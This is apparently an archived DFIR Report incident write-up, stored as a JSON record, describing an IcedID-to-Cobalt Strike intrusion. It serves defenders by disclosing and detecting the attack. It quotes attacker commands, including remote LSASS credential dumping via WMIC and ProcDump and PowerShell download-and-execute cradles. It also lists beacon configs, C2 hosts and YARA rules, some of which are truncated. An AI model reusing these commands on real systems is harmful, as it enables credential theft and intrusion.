{
	"id": "7d0bbe27-1a36-493e-b0d3-c3597d8ee02a",
	"created_at": "2026-04-06T00:21:04.469712Z",
	"updated_at": "2026-04-10T03:24:24.772811Z",
	"deleted_at": null,
	"sha1_hash": "d2418c076b79a9fbd864deb6bd8f3e5889f577c0",
	"title": "IcedID and Cobalt Strike vs Antivirus",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2587702,
	"plain_text": "IcedID and Cobalt Strike vs Antivirus\r\nBy editor\r\nPublished: 2021-07-19 · Archived: 2026-04-05 16:21:58 UTC\r\nIntro\r\nAlthough IcedID was originally discovered back in 2017, it did not gain in popularity until the latter half of 2020.  We have\r\nnow analyzed a couple ransomware cases in 2021 (Sodinokibi \u0026 Conti) that used IcedID as the initial foothold into the\r\nenvironment. \r\nIn June, we saw another threat actor utilize IcedID to download Cobalt Strike, which was used to pivot to other systems in\r\nthe environment.  Similar to the Sodinokibi case, anti-virus (AV) slowed down the attackers.  AV frustrated them to the point\r\nthey temporarily left the environment.  Eleven days later, activity returned to the environment with more Cobalt Strike\r\nbeacons, which they used to pivot throughout the domain using WMI. The threat actors, however, remained unable or\r\nunwilling to complete their final objectives. \r\nCase Summary\r\nThis intrusion once again highlights common tools in-use today for Initial Access and Post-Exploitation.  Our intrusion starts\r\nwhen a malicious Word document is executed that drops and executes an HTA file.  This HTA file is used to download\r\nIcedID in the form of a JPG file.  This file is actually a Windows DLL file, which is executed via regsvr32 (1st stage\r\nIcedID). \r\nIcedID downloads some 2nd stage payloads and loads the DLL into memory with rundll32 (miubeptk2.dll – IcedID – used\r\nfor persistence) and regsvr32 (ekix4.dll – Cobalt Strike beacon – privilege escalation via fodhelper) to pillage the domain. \r\nService Execution (T1569.002) via Cobalt Strike Beacon was used throughout the intrusion for privilege escalation. \r\nWMIC was utilized to launch ProcDump in an attempt to dump lsass.exe.  WMIC was also used to perform discovery of\r\nendpoint security software.  
A flurry of other programs were used to perform discovery within the environment including\r\nnltest.exe, adfind.exe via adf.bat, and net.exe.  Command and Control was achieved via IcedID and Cobalt Strike. \r\nThere were numerous attempts at lateral movement via Cobalt Strike beacons, with limited success.  Ultimately, the threat\r\nactors were unsuccessful when AV snagged their attempts to move to certain servers. \r\nParticular to this case, we saw an eleven-day gap in activity. While command and control never left, activity other than\r\nbeaconing ceased. On day eleven, new Cobalt Strike infrastructure was introduced to the environment, with the threat\r\nactor displaying new techniques that were successful in moving laterally where the initial activity had failed.\r\nThis may indicate a hand-off to a new group, or the original actor may have returned; either way, we did not see a final\r\naction on objectives.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt\r\nStrike, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here. Two of the Cobalt\r\nStrike servers used in this intrusion were added to our Threat Feed on 6/3/21 and the other one was added on 6/14/21.\r\nWe also have artifacts available from this case such as pcaps, memory captures, files, Kape packages, and more, under\r\nour Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 1 of 18\n\nAnalysis and reporting completed by @iiamaleks and @THIR_Sec\r\nReviewed by @ICSNick and @MetallicHack\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nInitial access for this intrusion was via a malicious attachment “order 06.21.doc”.  The attachment was a Microsoft Word\r\ndocument that drops a malicious HTA file “textboxNameNamespace.hta”. 
\r\nExecution\r\nAnalysis of the encoded HTA file revealed that a file named textboxNameNamespace.jpg was downloaded from\r\nhttp://povertyboring2020b[.]com.  This file’s extension is misleading, as the file is a Windows DLL. \r\nThe HTA file is written to:\r\n C:\\users\\public\r\nThe HTA file, when executed, downloads a file named “textboxNameNamespace.jpg”, which is actually an IcedID DLL file\r\nresponsible for the first stage. \r\nThrough the same HTA file, the IcedID first stage DLL file is executed via regsvr32.exe. \r\nIcedID executes via rundll32, dropping DLL files related to both the IcedID second stage and Cobalt Strike beacons. \r\nAfter the initial compromise, the threat actors went silent for eleven days. After that period of time, a new Cobalt Strike\r\nbeacon was run through IcedID, starting a second phase of their activities. \r\nPersistence\r\nIcedID establishes persistence on the compromised host using a scheduled task named ‘{0AC9D96E-050C-56DB-87FA-955301D93AB5}’ that executes its second stage. This scheduled task was observed to be executing hourly under the initially\r\ncompromised user. \r\nPrivilege Escalation\r\nEkix4.dll, a Cobalt Strike payload, was executed via the fodhelper UAC bypass. \r\nAdditional Cobalt Strike payloads were executed with the same fodhelper UAC bypass technique. \r\nCobalt Strike payloads were used to escalate privileges to SYSTEM via a service created to run a payload using\r\nrundll32.exe as the LocalSystem user.  This activity was observed on workstations, a file server, and a backup server. 
\r\nGetSystem was also used by the threat actors.\r\nCredential Access\r\nThe threat actors were seen using overpass-the-hash to elevate privileges in the Active Directory environment via Mimikatz-style\r\npass-the-hash logon events, followed by suspect Kerberos ticket requests matching network alert signatures.\r\nATTACK [PTsecurity] Overpass the hash. Encryption downgrade activity to ARCFOUR-HMAC-MD5\",10002228\r\nUsing these credentials, the threat actors attempted to use a Cobalt Strike beacon injected into the LSASS process to execute\r\nWMIC, which executed ProcDump on a remote system to dump credentials.\r\ncmd.exe /C wmic /node:\"servername.domainname\" process call create \"C:\\PerfLogs\\procdump.exe -accepteula -ma ls\r\nThis activity appears to have failed due to Windows Defender activity.\r\nDiscovery\r\nIcedID initially performed some discovery of the local system and the domain. \r\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nipconfig /all\r\nsysteminfo\r\nnet config workstation\r\nnet view /all /domain\r\nnltest /domain_trusts /all_trusts\r\nnltest /domain_trusts\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nLater, Cobalt Strike beacons were used to perform discovery of the system and domain. \r\ncmd.exe /C systeminfo\r\ncmd.exe /C nltest /dclist:DOMAIN.local\r\ncmd.exe /C nltest /domain_trusts /all_trusts\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:55869/'); Find-LocalAdminAccess\r\nA discovery batch script that runs ADFind.exe was dropped to the system. \r\nADFind.exe was executed by the discovery batch script. 
\r\ncmd.exe /C C:\\Windows\\Temp\\adf\\adf.bat\r\nadfind.exe -f \"(objectcategory=person)\"\r\nadfind.exe -f \"(objectcategory=organizationalUnit)\"\r\nadfind.exe -f \"objectcategory=computer\"\r\nadfind.exe -sc trustdmp\r\nadfind.exe -subnets -f (objectCategory=subnet)\r\nadfind.exe -f \"(objectcategory=group)\"\r\nadfind.exe -gcb -sc trustdmp\r\nPowerView was used to discover local administrator access in the network. The Cobalt Strike beacon itself was used as a\r\nproxy to connect and retrieve the PowerView file. \r\nCobalt Strike was injected into the winlogon.exe process and used to perform further discovery. \r\ncmd.exe /C net group \"domain Admins\" /domain\r\ncmd.exe /C net group \"Enterprise Admins\" /domain\r\ncmd.exe /C ping WORKSTATION\r\ncmd.exe /C net view \\\\WORKSTATION /all\r\ncmd.exe /C net view \\\\DOMAINCONTROLLER /all\r\ncmd.exe /C dir /s\r\nThe following shows the decoded PowerShell commands used by Cobalt Strike to perform discovery. 
\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:41046/'); Get-DomainController\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:38102/'); Get-DomainComputer -Properties dnshostname\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35452/'); Get-DomainComputer -OperatingSystem *server* -Pr\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:61999/'); Get-DomainComputer -Properties dnshostname -Ping\r\n$dr=Get-WmiObject Win32_LogicalDisk; $total=0; foreach($i in $dr){ ; if($i.DriveType -eq 3 ){$diskFill = ([int]($i.Size/1G\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:51127/'); Get-PSDrive\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:34025/'); Invoke-ShareFinder -Ping -CheckShareAccess -Verb\r\nLateral Movement\r\nLateral Movement chain #1 – The attacker was able to successfully move from workstation #1 to workstation #2 via\r\nservice execution.  The attacker tried to replicate this movement technique towards two servers but was stopped when their\r\nCobalt Strike PowerShell payloads were nabbed by AV. \r\nLateral Movement chain #2 – Another attempt was made to move from workstation #1 to one of the servers, but this\r\nattempt was also thwarted by AV.  Just like the previous attempt, a remote service was created, however, this time a DLL\r\npayload was used rather than a PowerShell payload. \r\nLateral Movement chain #3 – Privileges were escalated to SYSTEM on Workstation #1 via the Cobalt Strike ‘GetSystem’\r\ncommand which makes use of named pipes. A Cobalt Strike DLL was copied to a server and executed using WMI. This\r\nactivity was observed on three servers, including the Domain Controller.\r\nCommand and Control\r\nThe logs demonstrate multiple connections from IcedID to their C2 servers, including aws.amazon[.]com for connectivity\r\nchecks. 
\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 8 of 18\n\n91.193.19.37|443\r\nlookupup.uno\r\n45.153.240.135|443\r\nagalere.club\r\n12horroser.fun\r\n172.67.222.68|80\r\nfintopikasling.top\r\n185.38.185.121|443\r\ncontocontinue.agency\r\n164.90.157.246|443\r\n109.230.199.73|80\r\nThe Cobalt Strike beacons also make use of multiple C2 servers on the public internet. \r\nCobalt Strike Configs:\r\nkrinsop[.]com\r\n162.244.81.62\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 9 of 18\n\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3S: aa29d305dff6e6ac9cd244a62c6ad0c2\r\nCertificate Subject Key Identifier: 23:FA:7E:CD:F4:13:7C:96:30:AC:3C:DD:D6:25:99:DB:39:39:51:B3\r\nNot Before: Jun 4 18:57:59 2021 (GMT)\r\nNot After : Sep 2 18:57:59 2021 (GMT)\r\nIssuer: Let's Encrypt\r\nSubject Common: krinsop.com\r\nPublic Algorithm: rsaEncryption\r\n{\r\n\"x86\": {\r\n\"config\": {\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"Polling\": 5000,\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"C2 Server\": \"162.244.81.62,/jquery-3.3.1.min.js\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 10,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n\"Port\": 80,\r\n\"Method 2\": \"POST\",\r\n\"Beacon Type\": \"0 (HTTP)\"\r\n},\r\n\"sha256\": \"198cbe9ac054c0d79229b9d09fcbfbe5caa7702969f1f588eeca4f66318ebf12\",\r\n\"md5\": \"fb325956bbaf5f34ee8f3876a6c14d62\",\r\n\"sha1\": \"1b3c8375ad2087e647b44faf9b8c6460ad9ae97c\",\r\n\"time\": 1623709908992.6\r\n},\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 10 of 18\n\n\"x64\": {\r\n\"config\": {\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"Polling\": 5000,\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"C2 Server\": \"162.244.81.62,/jquery-3.3.1.min.js\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 10,\r\n\"Spawn To x64\": 
\"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n\"Port\": 80,\r\n\"Method 2\": \"POST\",\r\n\"Beacon Type\": \"0 (HTTP)\"\r\n},\r\n\"sha256\": \"9e1261fcefa27729712a78c4c1938987d1a57983839b588c6cb5bd23850d98e1\",\r\n\"md5\": \"cef2407d87d56f2656d502ae3f6e49f2\",\r\n\"sha1\": \"6810f5d44b21377b084b96151ab25e57e7d90abe\",\r\n\"time\": 1623709920309.7\r\n}\r\n}\r\n{\r\n\"x86\": {\r\n\"config\": {\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"Polling\": 5000,\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"C2 Server\": \"krinsop.com,/jquery-3.3.1.min.js\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 10,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n\"Port\": 443,\r\n\"Method 2\": \"POST\",\r\n\"Beacon Type\": \"8 (HTTPS)\"\r\n},\r\n\"sha256\": \"aa76fb1fa50a24c631a5d40878cc7af8a23ba265842bd9e85578d85f080b203a\",\r\n\"md5\": \"c4e04de7283fcddc4f3e394313e02a8d\",\r\n\"sha1\": \"edee07063c98ed57e12e41196c9bea63a3a0f4ee\",\r\n\"time\": 1623709904481.3\r\n},\r\n\"x64\": {\r\n\"config\": {\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"Polling\": 5000,\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"C2 Server\": \"krinsop.com,/jquery-3.3.1.min.js\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 10,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n\"Port\": 443,\r\n\"Method 2\": \"POST\",\r\n\"Beacon Type\": \"8 (HTTPS)\"\r\n},\r\n\"sha256\": \"b888d289ee46115ed33164855e74f21e9e2b657c3d11342b34d267a722e137eb\",\r\n\"md5\": \"2562d3b97b8352b785020a7ab7ac334f\",\r\n\"sha1\": \"80389f85fe8bbca65ca35bfa219b6e2a2815069d\",\r\n\"time\": 1623709913218.1\r\n}\r\n}\r\n213.252.245.62\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 11 of 18\n\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3S: ae4edc6faf64d08308082ad26be60767\r\nCertificate Subject Key Identifier: 0F:9E:24:12:4D:36:90:93:55:B5:8D:C1:26:0D:2F:79:BE:C2:78:9B\r\nNot Before: May 26 07:48:00 2021 
GMT\r\nNot After : Aug 24 07:48:00 2021 GMT\r\nIssuer Org: Let's Encrypt\r\nSubject Common: charity-wallet.com\r\nPublic Algorithm: rsaEncryption\r\n{\r\n\"x64\": {\r\n\"md5\": \"c282bfab34469e2884ea0a964f7faf86\",\r\n\"sha256\": \"4fb85bef421d23361fce6c7d00ed5047dd47e0ebaf1769be96b10c83c99441f8\",\r\n\"config\": {\r\n\"Jitter\": 37,\r\n\"Method 1\": \"GET\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 63565,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 443,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\regsvr32.exe\",\r\n\"C2 Server\": \"charity-wallet.com,/ch.html\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\regsvr32.exe\",\r\n\"HTTP Method Path 2\": \"/ba\"\r\n},\r\n\"time\": 1622753776178.3,\r\n\"sha1\": \"797d697c7a6770b2caa8e3b6c5e2e7b5ab7cc55b\"\r\n},\r\n\"x86\": {\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 12 of 18\n\n\"md5\": \"ed2dbbd89fb9abad7086f71def9f7cf5\",\r\n\"sha256\": \"6477ba90a44152ca98107c0bd00161a8a61daf32418654bc8c0f27e01eb43303\",\r\n\"config\": {\r\n\"Jitter\": 37,\r\n\"Method 1\": \"GET\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Polling\": 63565,\r\n\"Method 2\": \"POST\",\r\n\"Port\": 443,\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\regsvr32.exe\",\r\n\"C2 Server\": \"charity-wallet.com,/ch.html\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\regsvr32.exe\",\r\n\"HTTP Method Path 2\": \"/ba\"\r\n},\r\n\"time\": 1622753770976.5,\r\n\"sha1\": \"d1b9040e8bf1db317c18f903ab95f44b30736a78\"\r\n}\r\n}\r\ngmbfrom[.]com\r\n88.80.147.101\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3S: ae4edc6faf64d08308082ad26be60767\r\nCertificate: 04:2f:14:f8:9d:82:a2:39:2e:ea:8e:4f:c1:b7:0d:b8:bf:a7 Not Before: May 20 15:55:27 2021 GMT\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 13 of 18\n\nNot After : Aug 18 15:55:27 2021 GMT\r\nIssuer Org: Let's Encrypt\r\nSubject Common: gmbfrom.com\r\nPublic Algorithm: rsaEncryption\r\n{\r\n\"x86\": {\r\n\"sha1\": 
\"b785cae596f7b68376464e3e300fe0aff5bea845\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"Port\": 80,\r\n\"Method 1\": \"GET\",\r\n\"Polling\": 5000,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Jitter\": 10,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"C2 Server\": \"88.80.147.101,/jquery-3.3.1.min.js\",\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n},\r\n\"time\": 1622753064031.5,\r\n\"sha256\": \"dd0dd0b3e95ff62c45af048c0169e2631ac906da4a603cadbc7014cbcfb4e631\",\r\n\"md5\": \"56830f9cc0fe712e22921a7a5a0f1a53\"\r\n},\r\n\"x64\": {\r\n\"sha1\": \"11724324f8ec1940be87553ae2bd5f96b979a5d6\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"Port\": 80,\r\n\"Method 1\": \"GET\",\r\n\"Polling\": 5000,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Jitter\": 10,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n\"C2 Server\": \"88.80.147.101,/jquery-3.3.1.min.js\",\r\n\"HTTP Method Path 2\": \"/jquery-3.3.2.min.js\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n},\r\n\"time\": 1622753068830.2,\r\n\"sha256\": \"36a5e68810f3823470fadd578efb75b5c2d1ffe9f4a16d5566f0722257cc51ce\",\r\n\"md5\": \"9dde7f14a076a5c3db8f4472b87fd11e\"\r\n}\r\n}\r\nImpact\r\nWe did not observe the final actions of the threat actors during this intrusion. 
\r\nIOCs\r\nNetwork\r\n88.80.147.101|443\r\ngmbfrom.com\r\n213.252.245.62|443\r\ncharity-wallet.com\r\n162.244.81.62|443\r\nkrinsop.com\r\n91.193.19.37|443\r\nlookupup.uno\r\n45.153.240.135|443\r\nagalere.club\r\n12horroser.fun\r\n172.67.222.68|80\r\nfintopikasling.top\r\n185.38.185.121|443\r\ncontocontinue.agency\r\n164.90.157.246|443\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 14 of 18\n\n109.230.199.73|80\r\nhttp://povertyboring2020b[.]com\r\npovertyboring2020b[.]com\r\nFile\r\norder 06.21.doc\r\nb1254d3fa38e2418734d4a2851fc22a6\r\n7c71a7ae38ef95d36434f0b680b30393de9b95ec\r\n95af2e46631be234a51785845079265629462e809e667081eb0b723116e265f3\r\nekix4.dll\r\n74b91ef6278231c152259f58f0420ad4\r\ncbcd475e05642f7e0a049827c6a3c722046c591d\r\ne27b71bd1ba7e1f166c2553f7f6dba1d6e25fa2f3bb4d08d156073d49cbc360a\r\ntextboxNameNamespace.hta\r\ndecfd224c4317795dd7716c680a29dcb\r\n42c52ad41878deeecfe6526431a1e0bf34311286\r\nb17c7316f5972fff42085f7313f19ce1c69b17bf61c107b1ccf94549d495fa42\r\ntextboxNameNamespace.jpg\r\n13c928acdec1cc1682ed84d27b83841a\r\nf90fb56e148b17af89a896bbb0ba0b89fc0ecdb2\r\n010f52eda70eb9ff453e3af6f3d9d20cbda0c4075feb49c209ca1c250c676775\r\nadf.bat\r\nb94bb0ae5a8a029ba2fbb47d055e22bd\r\n035940bd120a72e2da1b6b7bb8b4efab46232761\r\nf6a377ba145a5503b5eb942d17645502eddf3a619d26a7b60df80a345917aaa2\r\nMuif.dll\r\n9e7756f47e57a03e6eb5fe7d2505b870\r\nfb6339704bf11507038ddaf8f01324da5b71ee19\r\n8b9d605b826258e07e63687d1cefb078008e1a9c48c34bc131d7781b142c84ab\r\nDetections\r\nNetwork\r\nET DNS Query to a *.top domain - Likely Hostile\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty\r\nATTACK [PTsecurity] Overpass the hash. 
Encryption downgrade activity to ARCFOUR-HMAC-MD5\r\nSigma\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_enc_c\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_procdump_lsass.y\r\nhttps://github.com/SigmaHQ/sigma/blob/99b0d32cec5746c8f9a79ddbbeb53391cef326ba/rules/windows/process_creation/win_trust_discovery.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_ad_find_discovery.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/7288ae93b9ec8d09f56cdc623a44a21fa0826afb/rules/windows/process_creation/process_creation_cobaltstrike\r\nhttps://github.com/SigmaHQ/sigma/blob/bbe67ddc73adaa245941fe240db4eff3279078a8/rules/windows/registry_event/sysmon_cobaltstrike_service_in\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_fodhelper.yml\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_pass_the_hash_2.yml\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2021-07-13\r\nIdentifier: Case 4485\r\nReference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 15 of 18\n\nimport \"pe\"\nrule textboxNameNamespace {\nmeta:\ndescription = \"4485 - file textboxNameNamespace.hta\"\nauthor = \"The DFIR Report\"\nreference = \"https://thedfirreport.com/\"\ndate = \"2021-07-13\"\nhash1 = \"b17c7316f5972fff42085f7313f19ce1c69b17bf61c107b1ccf94549d495fa42\"\nstrings:\n$s1 = \"idGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gTG1lciByYXY7KSJsbGVocy50cGlyY3N3Iih0Y2\n$s2 = \"/\n\nfX17KWUoaGN0YWN9O2Vzb2xjLnRzbm9Dbm90dHVCd2VpdjspMiAsImdwai5lY2Fwc2VtY\n$s3 = 
\"oveTo(-100, -100);var swapLength = tplNext.getElementById('variantDel').innerHTML.split(\\\"aGVsbG8\\\");va\n$s4 = \"wxyz0123456789+/\n\n\" fullword ascii\n$s12 = \"t5cnR7KTAwMiA9PSBzdXRhdHMuZXRhREl4b2J0eGV0KGZpOykoZG5lcy5ldGFESXhvYnR4ZXQ7KWVzbGFmICwiNE9Uc3NldUk9ZmVy\n$s13 = \"tYU5vcmV6IHJhdg==aGVsbG8msscriptcontrol.scriptcontrol\n\nABCDEFGHIJKLMNOPQRSTUV\n$s14 = \"nGlob(pasteVariable){return(tplNext.getElementById(pasteVariable).innerHTML);}function lConvert(){retu\n$s15 = \"ipt'\u003eCall byteNamespaceReference(textSinLibrary)\n\n$s9 = \"Please verify that the correct path and file name are given\" fullword ascii\r\n$s10 = \"Critical error\" fullword ascii\r\n$s11 = \"Please read this information carefully\" fullword ascii\r\n$s12 = \"Unknown error occurred for time: \" fullword ascii\r\n$s13 = \"E 3y4i\" fullword ascii\r\n$s14 = \"D$tOuo2\" fullword ascii\r\n$s15 = \"D$PH9D$8tXH\" fullword ascii\r\n$s16 = \"E$hik7\" fullword ascii\r\n$s17 = \"D$p]mjk\" fullword ascii\r\n$s18 = \"B):0~\\\"Z\" fullword ascii\r\n$s19 = \"Richo/\" fullword ascii\r\n$s20 = \"D$xJij\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 70KB and\r\n( pe.imphash() == \"42205b145650671fa4469a6321ccf8bf\" and pe.exports(\"StartW\") or 8 of them )\r\n}\r\nrule textboxNameNamespace_2 {\r\nmeta:\r\ndescription = \"4485 - file textboxNameNamespace.jpg\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-07-13\"\r\nhash1 = \"010f52eda70eb9ff453e3af6f3d9d20cbda0c4075feb49c209ca1c250c676775\"\r\nstrings:\r\n$s1 = \"uwunhkqlzle.dll\" fullword ascii\r\n$s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s3 = \"operator co_await\" fullword ascii\r\n$s4 = \"ggeaxcx\" fullword ascii\r\n$s5 = \"wttfzwz\" fullword ascii\r\n$s6 = \"fefewzydtdu\" fullword ascii\r\n$s7 = \"ilaeemjyjwzjwj\" fullword ascii\r\n$s8 = \"enhzmqryc\" fullword ascii\r\n$s9 = \"flchfonfpzcwyrg\" fullword ascii\r\n$s10 = \"dayhcsokc\" fullword 
ascii\r\n$s11 = \"mtqnlfpbxghmlupsn\" fullword ascii\r\n$s12 = \"zqeoctx\" fullword ascii\r\n$s13 = \"ryntfydpykrdcftxx\" fullword ascii\r\n$s14 = \"atxvtwd\" fullword ascii\r\n$s15 = \"icjshmfrldy\" fullword ascii\r\n$s16 = \"lenkuktrncmxiafgl\" fullword ascii\r\n$s17 = \"alshaswlqmhptxpc\" fullword ascii\r\n$s18 = \"izonphi\" fullword ascii\r\n$s19 = \"atttyokowqnj\" fullword ascii\r\n$s20 = \"nwvohpazb\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 500KB and\r\n( pe.imphash() == \"4d46e641e0220fb18198a7e15fa6f49f\" and ( pe.exports(\"PluginInit\") and pe.exports(\"alshaswlqm\r\n}\r\nrule case_4485_ekix4 {\r\nmeta:\r\ndescription = \"4485 - file ekix4.dll\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-07-13\"\r\nhash1 = \"e27b71bd1ba7e1f166c2553f7f6dba1d6e25fa2f3bb4d08d156073d49cbc360a\"\r\nstrings:\r\n$s1 = \"f159.dll\" fullword ascii\r\n$s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s3 = \"ossl_store_get0_loader_int\" fullword ascii\r\n$s4 = \"loader incomplete\" fullword ascii\r\n$s5 = \"log conf missing description\" fullword ascii\r\n$s6 = \"SqlExec\" fullword ascii\r\n$s7 = \"process_include\" fullword ascii\r\n$s8 = \"EVP_PKEY_get0_siphash\" fullword ascii\r\n$s9 = \"process_pci_value\" fullword ascii\r\n$s10 = \"EVP_PKEY_get_raw_public_key\" fullword ascii\r\n$s11 = \"EVP_PKEY_get_raw_private_key\" fullword ascii\r\n$s12 = \"OSSL_STORE_INFO_get1_NAME_description\" fullword ascii\r\nhttps://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/\r\nPage 17 of 18\n\n$s13 = \"divisor-\u003etop \u003e 0 \u0026\u0026 divisor-\u003ed[divisor-\u003etop - 1] != 0\" fullword wide\r\n$s14 = \"ladder post failure\" fullword ascii\r\n$s15 = \"operation fail\" fullword ascii\r\n$s16 = \"ssl command section not found\" fullword ascii\r\n$s17 = \"log key invalid\" fullword ascii\r\n$s18 = \"cms_get0_econtent_type\" fullword ascii\r\n$s19 = \"log conf missing key\" 
fullword ascii\r\n$s20 = \"ssl command section empty\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 11000KB and\r\n( pe.imphash() == \"547a74a834f9965f00df1bd9ed30b8e5\" or 8 of them )\r\n}\r\nMITRE\r\nSpearphishing Attachment – T1566.001\r\nMalicious File – T1204.002\r\nSigned Binary Proxy Execution – T1218\r\nWindows Management Instrumentation – T1047\r\nCommand and Scripting Interpreter – T1059\r\nPowerShell – T1059.001\r\nWindows Command Shell – T1059.003\r\nService Execution – T1569.002\r\nWindows Service – T1543.003\r\nBypass User Account Control – T1548.002\r\nOS Credential Dumping – T1003\r\nSystem Information Discovery – T1082\r\nSecurity Software Discovery – T1518.001\r\nDomain Trust Discovery – T1482\r\nNetwork Share Discovery – T1135\r\nSMB/Windows Admin Shares – T1021.002\r\nLateral Tool Transfer – T1570\r\nApplication Layer Protocol – T1071\r\nInternal case #4485\r\nSource: https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/"
	],
	"report_names": [
		"icedid-and-cobalt-strike-vs-antivirus"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
